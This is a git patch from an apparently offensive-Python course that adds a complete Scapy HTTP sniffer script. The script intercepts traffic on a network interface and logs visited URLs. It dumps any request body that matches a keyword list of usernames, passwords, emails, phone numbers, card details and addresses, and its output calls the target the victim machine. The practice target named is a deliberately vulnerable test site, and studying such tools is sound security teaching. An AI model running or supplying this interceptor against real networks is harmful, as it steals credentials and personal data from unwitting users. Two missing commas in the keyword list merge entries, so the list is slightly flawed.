From 4abbfdf26146e2d546b82f9927329d8c15acf1ea Mon Sep 17 00:00:00 2001
From: Manuel Vergara <manuel@vergaracarmona.es>
Date: Mon, 29 Jan 2024 19:28:10 +0100
Subject: [PATCH] Add sniffer scapy

---
 .../15_hacking/03_http_sniffer_scapy.py       | 105 ++++++++++++++++++
 1 file changed, 105 insertions(+)
 create mode 100644 python-ofensivo/15_hacking/03_http_sniffer_scapy.py

diff --git a/python-ofensivo/15_hacking/03_http_sniffer_scapy.py b/python-ofensivo/15_hacking/03_http_sniffer_scapy.py
new file mode 100644
index 0000000..2ec7e5e
--- /dev/null
+++ b/python-ofensivo/15_hacking/03_http_sniffer_scapy.py
@@ -0,0 +1,105 @@
+# /usr/bin/env python3
+"""
+HTTP sniffer
+
+Práctica con testphp.vulnweb.com
+
+"""
+
+import argparse
+import signal
+import scapy.all as scapy
+from scapy.layers import http
+
+
+def def_handler(sig, frame):
+
+    print("\n\n[!] Saliendo del programa...\n")
+    exit(1)
+
+
+signal.signal(signal.SIGINT, def_handler)
+
+
+def get_arguments():
+    """
+    Obtiene los argumentos de la línea de comandos
+    """
+
+    parser = argparse.ArgumentParser(description="DNS sniffer")
+    parser.add_argument(
+        "-i", "--interface",
+        required=True, dest="interface",
+        help="Interfaz de red a utilizar"
+    )
+    args = parser.parse_args()
+
+    return args
+
+
+def process_sniffed_packet(packet):
+    """
+    Procesa el paquete sniffado
+    """
+
+    cred_keywords = [
+        "username", "user", "uname", "urname", "user_name", "usern"
+        "login", "password", "pass", 
+        "mail", "email", "correo",
+        "phone", "telephone", "tel", "cellphone", "cell", "cel", "movil",
+        "credit", "card", "cc", "tarjeta", "credito", "debito", "debit", "ucc"
+        "address", "direccion", "dir", "street", "calle", "avenue", "av",
+        "location", "city", "country"]
+
+    if packet.haslayer(http.HTTPRequest):
+
+        url = "http://" + \
+            packet[http.HTTPRequest].Host.decode() + \
+            packet[http.HTTPRequest].Path.decode()
+        
+        print(f"[+] URL visitada: {url}")
+
+        if packet.haslayer(scapy.Raw):
+
+            try:
+
+                response = packet[scapy.Raw].load.decode()
+
+                for keyword in cred_keywords:
+
+                    if keyword in response:
+
+                        print(f"[+] Información comprometida: {response}")
+                        break
+
+            except:
+
+                pass
+
+
+def sniff(interface):
+    """
+    Sniffing de paquetes
+    """
+
+    print("\n[+] Interceptando paquetes de la máquina victima: \n")
+
+    scapy.sniff(
+        iface=interface, store=False,
+        prn=process_sniffed_packet
+    )
+
+
+def main():
+    """
+    Función principal
+    """
+
+    arguments = get_arguments()
+
+    sniff(arguments.interface)
+
+
+if __name__ == "__main__":
+
+    main()